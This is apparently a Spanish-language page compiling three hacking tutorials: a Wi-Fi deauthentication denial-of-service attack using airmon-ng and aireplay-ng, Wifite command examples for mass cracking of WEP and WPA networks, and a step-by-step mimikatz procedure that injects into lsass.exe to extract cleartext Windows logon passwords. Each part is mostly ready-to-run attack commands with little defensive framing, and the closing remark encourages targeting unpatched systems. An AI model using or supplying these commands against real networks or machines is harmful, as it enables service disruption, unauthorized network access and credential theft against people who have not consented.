Está en la página 1de 7

[Ataque DoS Wireless] Denegacin de Servicio a una Red Wi-fi

Hace ya un tiempo que me pidieron que escribiera sobre este tema y recin ahora me doy el tiempo de hacerlo. El objetivo de una Denegacin de Servicio a una Red Wi-fi es dejar a los usuarios legtimos de una red Wi-fi sin poder acceder a Internet, esto se logra inundando con paquetes de deautenticacin al punto de acceso y/o al cliente. Cuando se quiere realizar un ataque DoS a una Red Wi-fi, se puede atacar de 2 formas, una es atacando al punto de acceso y dejar sin acceso a ningn cliente o atacando solamente a un cliente en especfico.

0.- Preliminar:
Primero ponemos la tarjeta de red en modo monitor: airmon-ng start wlan0 Revisamos el canal del Punto de acceso y ponemos en modo monitor en ese canal en especfico: airmon-ng -c 5 mon0 Donde 5 es el canal del punto de acceso y mon0 es la interfaz en modo monitor.

1.- DoS al punto de acceso:


Con aireplay enviamos paquetes de deautenticacin en un buncle infinito (-0 0) al Punto de acceso. aireplay-ng -0 0 -a 99:99:99:99:99:99 mon0 Donde 99:99:99:99:99:99 es la mac del Punto de acceso.

2.- DoS al Cliente:


Con aireplay enviamos paquetes de deautenticacin en un buncle infinito (-0 0) a un cliente en especfico. aireplay-ng -0 0 -a 99:99:99:99:99:99 -c 11:11:11:11:11:11 mon0 Donde 99:99:99:99:99:99 es la mac del Punto de acceso y 11:11:11:11:11:11 es la mac del Cliente.

--------------------------------------------------------------------------------------------------------------------------------[Wifite] Ataca mltiples redes WEP y WAP al mismo tiempo


Wifite es una herramienta diseada para Backtrack4 RC1 (distribucin de Ubuntu). Wifite Solamente cuenta con soporte para Linux y no lo tiene para Windows o Osx. El propsito de esta herramienta es atacar multiples redes WEP y WAP al mismo tiempo, automatizandola con pocos argumentos para que trabaje sola.

Modo Gui Las principales caractersticas son que trae numerosos filtros para especificar exactamente qu atacar (WEP/WPA/both, por encima de ciertas intensidad de

seal, por canales, etc), se puede paquetes/segundos, ignorar fake-auth.

personalizar

tiempo

de

espera,

Trae una opcin anonymous que cambia la MAC al azar antes de atacar, y cuando termina de atacar se vuelve a cambiar. Se hace un backup con todos los handshakes captados en un archivo en el directorio donde se encuentra wifite.py aparte que se guardan todas las contraseas crackeadas en el archivo log.txt. Wifite viene en version GUI y versin consola:

Modo consola

Algunos ejemplos en el modo consola son:


Crackear todos los puntos WEP: ./wifite.py -all -nowpa Crackear todos los puntos WEP con seal mejor que (o igual que) 50 dB: ./wifite.py -p 50 -nowpa Atacar todos lo puntos de acceso, usando 'darkc0de.lst' para crackear los handshakes WPA: ./wifite.py -all --dict /pentest/passwords/wordlists/darkc0de.lst Atacar todos los puntos WAP, pero no crackearlos (los handshakes se guardan automticamente): ./wifite.py -all -nowpa --dict none Crackear todos los puntos WEP con seal mejor que (o igual que) 50 dB, dando 15 minutos para cada mtodo de ataque WEP, y enviando 600 paquetes/sec: ./wifite.py --power 50 -wepw 15 -pps 600 Para tratar de romper la red "2WIRE752" encriptada en WEP, sin detenerse hasta que sea crackeada o interrumpida por el usuario con CONTROL + C: ./wifite.py -e "2WIRE752" -wepw 0

Descarga de wifite.py
Ms Informacin y web del proyecto es: http://code.google.com/p/wifite/

------------------------------------------------------------------------------------------------------------------

Obtener Contrasea Administrador de Windows desde Windows (Sin Hash NTML/LM)

Bueno, la verdad es que hace una semana que le sobre est noticia en www.s21sec.com, la intent poner a prueba, pero no me funcion xP por falta de tiempo y paciencia, pero fue hace poco que en germanvasquez.wordpress.com explican un poco ms detallado el uso de la herramienta en cuestin. As que ahora entrar a explicar el tema. Desde ya hace tiempo que la forma de obtener la contrasea de administrador de Windows desde Windows ha sido obteniendo un Hash encriptado en NTLM o LM desde el SAM remoto o local de Windows, una vez obtenido ese Hash hay que crackear la contraseas por fuerza bruta mediante Rainbow Tables, lo que se demora mucho y se hace imposible si tiene ms de 10 dgitos la contrasea, por lo cual muchas veces se prefieres usar la tcnica Pass the Hash que consiste en la posibilidad de autenticarse entre mquinas Windows sin necesidad de password, solamente con el Hash (No se preocupen si no entendieron, este es un mega resumen que da para escribir mucho ms). Ahora... Gracias a un investigador francs apodado "Gentil Kiwi" que ha descubierto una nueva tcnica que consta de: Dentro del LSA (Local Security Authority) de Windows existen dos proveedores de autenticacin por defecto (Tspkg y Wdigest) que almacenan las credenciales de los usuarios de forma reversible. Realmente no por un fallo inadvertido, si no porque estos mdulos proveen autenticacin a otros esquemas que necesitan conocer la contrasea, no slo el hash. Sin embargo, esto facitita a un atacante la posibilidad de recuperar las contraseas en texto claro si dispone de permisos de debug sobre el proceso del LSASS (grupo de adminitradores), algo que podra haber conseguido previamente, por ejemplo, mediante la explotacin previa de una vulnerabilidad de escalado privilegios (accediendo como SYSTEM). Pues bueno, ya mucho blah blah ahora manos a la obra: 1.- Nos descargamos la herramienta desarrollada por "Gentil Kiwi": mimikatz 2.- Abrimos el CMD con privilegios de administrador:

3.- Ejecutamos mimikatz.exe desde la consola que abrimos anteriormente. 4.- Ahora ejecutamos una serie de comandos que entro a explicar despus de la imagen:

(1) Damos privilegios sobre el proceso lsass.exe privilege::debug (2) Inyectamos el proceso lsass.exe y la dll maliciosa sekurlsa.dll inject::process lsass.exe sekurlsa.dll (3) Obtenemos las contraseas de Inicio de Sesin @getLogonPasswords (4) Es la contraseas del usuario AADMIN, (5) La misma contrasea pero de otro inicio de sesin. El mtodo funciona en Windows XP, Vista y 7, en anteriores no s. Yo creo que pronto ser parchado, pero siempre se puede contar con que usen un SO desactualizado...

También podría gustarte